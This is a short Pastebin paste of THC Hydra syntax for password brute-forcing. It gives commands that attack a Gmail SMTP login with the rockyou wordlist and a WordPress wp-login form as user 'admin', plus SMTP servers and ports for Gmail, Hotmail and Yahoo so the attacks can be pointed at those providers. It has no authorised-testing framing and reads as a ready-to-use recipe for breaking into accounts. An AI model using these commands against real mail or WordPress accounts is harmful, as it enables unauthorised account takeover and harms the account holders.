Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THC HYDRA SYNTAX
- hydra server smtp -l example@gmail.com -P wordlist -s port -S -v -V
- example:hydra smtp.gmail.com smtp -l example@gmail.com -P /home/user/Desktop/rockyou.txt -s 465 -S -v -V
- hydra -v http://site.com/ http-form-post "wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location" l admin -P password_path
- Info about mail accounts
- gmail
- server: smtp.gmail.com
- port: 465
- hotmail
- server: smtp.live.com
- port: 587
- yahoo
- server: smtp.mail.yahoo.com
- port:587
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement